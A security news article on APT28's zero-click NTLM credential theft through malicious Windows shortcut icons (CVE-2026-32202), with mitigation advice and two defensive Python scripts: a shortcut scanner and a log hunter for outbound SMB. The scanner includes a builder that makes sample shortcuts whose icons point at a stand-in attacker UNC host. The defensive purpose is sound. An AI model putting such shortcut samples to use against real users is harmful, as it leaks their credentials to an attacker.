PROBABLYPWNED
Vulnerabilities · April 28, 2026 · 5 min read

APT28 Exploiting Windows Shell Flaw to Steal NTLM Credentials

Russian state hackers weaponize CVE-2026-32202, an incomplete patch for Windows Shell that enables zero-click NTLM hash theft. Microsoft confirms active exploitation after Akamai discovers the bypass.

Marcus Chen

Microsoft confirmed Sunday that a Windows Shell vulnerability is being actively exploited in the wild—and the attackers are Russia's APT28. The flaw, CVE-2026-32202, stems from an incomplete patch that left a credential theft vector wide open even after Microsoft's February fix, according to The Hacker News.

Security researchers at Akamai discovered that while Microsoft addressed the remote code execution risk in CVE-2026-21510, the patch failed to block NTLM hash leakage. APT28—also tracked as Fancy Bear, Forest Blizzard, and Pawn Storm—has weaponized this gap in campaigns targeting Ukraine and European Union nations. This attack pattern resembles tactics seen in the group's Operation Neusploit campaign earlier this year.

How the Attack Works

The exploit is zero-click in the sense that the victim never opens or runs the shortcut. When a user merely browses to a folder containing a malicious LNK shortcut file, such as the Downloads folder, Windows Explorer automatically attempts to render the shortcut's icon. If the icon location points at an attacker-controlled UNC path, Windows initiates an SMB connection to fetch it, which triggers an NTLM authentication handshake with no further user interaction.

"The victim machine was still authenticating to the attacker's server," Akamai researcher Maor Dahan explained. "APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library from a remote server using a UNC path."

The handshake delivers the victim's Net-NTLMv2 response to the attacker's server. That response is not a reusable password hash (it cannot be used for pass-the-hash), but it can be cracked offline if the underlying password is weak, or relayed in real time, while the handshake is still in flight, to another service that accepts NTLM and does not enforce signing or channel binding, letting the attacker authenticate as the victim elsewhere on the network.
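The icon-rendering trigger described above is easy to hunt for on disk, because the icon path is a plain field in the MS-SHLLINK file format. The scanner below is an added example written for this article, not Akamai's tooling or anything recovered from the campaign: it parses the ShellLinkHeader, skips the optional LinkTargetIDList and LinkInfo structures, reads the ICON_LOCATION string and the IconEnvironmentDataBlock (the two documented places a shortcut can name its icon), and flags any value that resolves to a UNC host outside an allow-list. The sample shortcuts, the `fileserver01` name and the 203.0.113.10 address are constructed for the example; the page does not say which field the real samples used.

```python
"""Hunt for .lnk files whose icon lives on a remote UNC host (added example; constructed samples)."""
import os
import struct
import sys

# ShellLinkHeader constants from MS-SHLLINK.
LINK_CLSID = bytes.fromhex("0114020000000000C000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
ICON_ENV_SIG, ICON_ENV_SIZE = 0xA0000007, 0x314   # IconEnvironmentDataBlock
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data):
    """Return the StringData fields plus any IconEnvironmentDataBlock path."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:              # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                        # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"icon_env": None}
    width = 2 if flags & IS_UNICODE else 1
    for bit, name in STRING_FIELDS:                  # CountCharacters + chars, fixed order
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            pos += 2 + count * width
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    while pos + 8 <= len(data):                      # ExtraData blocks until a TerminalBlock (<4)
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        if sig == ICON_ENV_SIG and size >= ICON_ENV_SIZE:   # TargetAnsi[260] then TargetUnicode[520]
            ansi = data[pos + 8:pos + 268].split(b"\x00", 1)[0].decode("cp1252", "replace")
            uni = data[pos + 268:pos + 788].decode("utf-16-le", "replace").split("\x00", 1)[0]
            fields["icon_env"] = uni or ansi
        pos += size
    return fields


def unc_host(path):
    """Host from a UNC path (\\\\host\\share, //host/share, \\\\?\\UNC\\host\\share), else None."""
    p = (path or "").strip().replace("/", "\\")
    if p.upper().startswith("\\\\?\\UNC\\"):
        p = "\\\\" + p[8:]
    if not p.startswith("\\\\"):
        return None
    return p[2:].split("\\", 1)[0].lower() or None


def assess(data, trusted_hosts=()):
    """(field, host, path) for every icon reference that leaves the host and is not allow-listed."""
    info = parse_lnk(data)
    trusted = {h.lower() for h in trusted_hosts}
    return [(f, unc_host(info[f]), info[f]) for f in ("icon_location", "icon_env")
            if info.get(f) and unc_host(info[f]) and unc_host(info[f]) not in trusted]


def build_lnk(icon_location, icon_env=None, unicode=True):
    """Minimal .lnk carrying only an icon path: constructed test data, not a real capture."""
    flags = HAS_ICON_LOCATION | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    text = icon_location.encode("utf-16-le" if unicode else "cp1252")
    body = struct.pack("<H", len(icon_location)) + text
    if icon_env:
        ansi = icon_env.encode("cp1252")[:259].ljust(260, b"\x00")
        uni = icon_env.encode("utf-16-le")[:518].ljust(520, b"\x00")
        body += struct.pack("<II", ICON_ENV_SIZE, ICON_ENV_SIG) + ansi + uni
    return header + body + struct.pack("<I", 0)      # TerminalBlock


# Constructed samples; 203.0.113.10 is a documentation address standing in for attacker infrastructure.
SAMPLES = {
    "benign":    build_lnk("%SystemRoot%\\System32\\shell32.dll"),
    "remote":    build_lnk("\\\\203.0.113.10\\share\\icon.ico"),
    "intranet":  build_lnk("\\\\fileserver01\\public\\icon.ico"),
    "env_block": build_lnk("C:\\Windows\\System32\\imageres.dll",
                           icon_env="\\\\?\\UNC\\203.0.113.10\\c$\\icon.ico"),
}


def scan_directory(root, trusted_hosts=()):
    """Walk a tree and return {path: findings} for every .lnk whose icon points off-host."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for n in (n for n in names if n.lower().endswith(".lnk")):
            p = os.path.join(dirpath, n)
            try:
                with open(p, "rb") as fh:
                    found = assess(fh.read(), trusted_hosts)
            except (OSError, ValueError):
                continue                             # unreadable or not really a shortcut
            if found:
                hits[p] = found
    return hits


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:10s} {assess(blob, trusted_hosts=('fileserver01',))}")
    for path, found in scan_directory(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, found)
```

Run it against a user's Downloads folder or an extracted mail attachment directory; anything that resolves to a host you don't own is worth pulling for analysis. The allow-list matters because intranet shortcuts legitimately reference icons on file servers, so a bare "any UNC" rule will be noisy in most enterprises.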

The attack chain combines CVE-2026-32202 with CVE-2026-21513, an MSHTML Framework protection bypass (CVSS 8.8), to defeat Microsoft Defender SmartScreen and achieve code execution. This mirrors tactics we covered in the PhantomCore campaign that similarly chained multiple vulnerabilities against Russian-speaking targets.

An Incomplete Patch Created the Gap

Microsoft originally patched CVE-2026-21510 (CVSS 8.8) in February 2026 after APT28 exploited it as a zero-day. That fix stopped remote code execution through malicious shortcut files. But Akamai's analysis found the patch left the authentication coercion pathway intact.

CVE-2026-32202 carries a modest CVSS score of 4.3, appropriate for an information disclosure in isolation but misleading given the real-world implications. Captured NTLM authentication enables lateral movement, privilege escalation, and persistent access. In Active Directory environments a single relayed or cracked credential can cascade into full domain compromise, a risk we've seen exploited in Microsoft Entra ID attacks this month.

CISA added CVE-2026-21510 to its Known Exploited Vulnerabilities catalog in February, requiring federal agencies to patch by March 3. The new bypass means organizations that patched on schedule may still be vulnerable if they haven't applied April's cumulative updates.

APT28's December Campaign

According to CERT-UA and Akamai's research, APT28 exploited these vulnerabilities in December 2025 attacks against Ukrainian government entities and EU diplomatic targets. The campaigns used weaponized LNK files likely delivered via spear-phishing emails.

This follows APT28's established playbook. The group—attributed to Russia's GRU military intelligence—consistently targets diplomatic and military entities in nations supporting Ukraine. We've tracked their credential harvesting operations across the Balkans and Middle East using similar techniques.

The December campaign went undetected until Akamai's disclosure, highlighting how nation-state actors can operate in the gap between initial exploitation and patch release.

Who Needs to Act Now

All supported Windows client and server releases are affected, since the vulnerable code lives in the Shell component every edition ships:

  • Windows 10 (all supported versions)
  • Windows 11 (all versions)
  • Windows Server 2016, 2019, 2022, and 2025

Organizations should apply April 2026 Patch Tuesday updates immediately. The combination of confirmed nation-state exploitation, zero-click attack vector, and credential theft makes this a high-priority fix regardless of the numerical CVSS score. Network security vendors including FortiGuard have already released IPS signatures to detect exploitation attempts.

Detection and Mitigation

Beyond patching, security teams should:

  1. Monitor outbound SMB traffic (TCP 445, and 139 for NetBIOS sessions) to external IP addresses; legitimate SMB rarely crosses the network perimeter
  2. Block outbound SMB at the firewall for systems that don't need external file sharing, and remember that when SMB is unreachable Windows can fall back to WebDAV over HTTP/HTTPS for the same UNC path if the WebClient service is running, so disable WebClient where it isn't needed
  3. Restrict NTLM: set the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy to Deny all (run it in Audit mode first to find legitimate dependencies), and migrate to Kerberos-only authentication where feasible
  4. Review logs for suspicious LNK file creation or access in user directories, particularly Downloads and email attachment folders
  5. Implement application control (AppLocker or WDAC) to restrict execution from high-risk locations; this addresses the follow-on code-execution stage, not the credential leak itself, which happens inside Explorer's icon rendering without running any attacker-supplied code
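Items 1 and 2 above translate directly into a hunt over connection logs. The script below is an added example written for this article, not a vendor signature: it reads Zeek conn.log-style records (the field layout and every log line here are constructed), flags TCP 445/139 or service `smb` to any destination outside an explicit list of internal ranges, and then checks whether the same workstation opened HTTP/HTTPS to the same destination within 30 seconds, which is what the WebDAV fallback looks like when port 445 is blocked but the WebClient service is running. The internal ranges, the 30-second window and the 10.20.0.0/16 workstation range are assumptions to adjust; 203.0.113.10, 198.51.100.7 and 2001:db8::1 are documentation addresses standing in for attacker infrastructure.

```python
"""Flag SMB sessions that leave the network, plus WebDAV follow-ups (added example; constructed log)."""
import ipaddress
from collections import defaultdict

SMB_PORTS = {445, 139}
# "Internal" is defined explicitly (RFC 1918, loopback, link-local, ULA) rather than via
# ipaddress.is_private, which would also treat documentation ranges as internal.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]

# Constructed conn.log excerpt, tab-separated: ts, orig_h, orig_p, resp_h, resp_p, proto, service.
SAMPLE_LOG = """\
1714300000.1\t10.20.1.15\t51234\t10.20.5.2\t445\ttcp\tsmb
1714300002.7\t10.20.1.15\t51240\t203.0.113.10\t445\ttcp\tsmb
1714300003.0\t10.20.1.15\t51241\t203.0.113.10\t80\ttcp\thttp
1714300010.4\t10.20.1.80\t51500\t198.51.100.7\t139\ttcp\t-
1714300011.9\t10.20.1.80\t51501\t2001:db8::1\t445\ttcp\tsmb
1714300020.3\t10.20.2.9\t51600\t172.16.0.4\t445\ttcp\tsmb
"""


def is_external(addr, internal=INTERNAL_NETS):
    """True when the address is outside every listed internal range (IPv4 or IPv6)."""
    ip = ipaddress.ip_address(addr)
    return not any(ip in net for net in internal)


def parse_conn_line(line):
    ts, orig_h, _orig_p, resp_h, resp_p, proto, service = line.rstrip("\n").split("\t")
    return {"ts": float(ts), "orig_h": orig_h, "resp_h": resp_h,
            "resp_p": int(resp_p), "proto": proto, "service": service}


def records(log_text):
    return [parse_conn_line(l) for l in log_text.splitlines() if l and not l.startswith("#")]


def find_outbound_smb(log_text, internal=INTERNAL_NETS):
    """{(source, destination): [timestamps]} for SMB-by-port-or-service to external hosts."""
    findings = defaultdict(list)
    for c in records(log_text):
        smb = c["resp_p"] in SMB_PORTS or c["service"] == "smb"
        if smb and c["proto"] == "tcp" and is_external(c["resp_h"], internal):
            findings[(c["orig_h"], c["resp_h"])].append(c["ts"])
    return dict(findings)


def webdav_followups(log_text, findings, window=30.0):
    """Pairs where the source also hit the same destination on 80/443 within `window` seconds
    after an SMB attempt: the pattern of the WebClient (WebDAV) fallback when 445 is blocked."""
    out = set()
    for c in records(log_text):
        key = (c["orig_h"], c["resp_h"])
        if key in findings and c["resp_p"] in (80, 443) \
           and any(0 <= c["ts"] - t <= window for t in findings[key]):
            out.add(key)
    return out


if __name__ == "__main__":
    hits = find_outbound_smb(SAMPLE_LOG)
    fallback = webdav_followups(SAMPLE_LOG, hits)
    for (src, dst), stamps in sorted(hits.items()):
        tag = " (WebDAV follow-up seen)" if (src, dst) in fallback else ""
        print(f"{src} -> {dst}: {len(stamps)} SMB attempt(s){tag}")
```

The service column is checked alongside the port because Zeek labels SMB on non-standard ports, and the external check is deliberately not `is_private`, so a misconfigured allow-list does not silently hide attacker ranges. Feed it your own conn.log (or translate the field positions for another sensor) and pivot from any hit to the workstation's recent LNK downloads.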

For organizations in sectors APT28 typically targets—government, defense, energy, and diplomatic entities—consider this an elevated threat requiring immediate action.

Why This Matters

Incomplete patches are an underappreciated attack surface. Vendors fix the most obvious vulnerability, but determined attackers probe for residual weaknesses. APT28 found one that turned a patched RCE into persistent credential theft capability.

The low CVSS score obscures real risk. A 4.3 suggests low priority, but stolen NTLM hashes have enabled some of the most damaging breaches in recent memory. Score-based patching prioritization continues to fail organizations when it ignores active exploitation context.

Microsoft's Sunday advisory update—acknowledging exploitation days after initial publication—indicates the company confirmed APT28 activity and chose to warn defenders publicly. That's an implicit call to action. Organizations still running vulnerable systems should treat this as the emergency it is.

Related Articles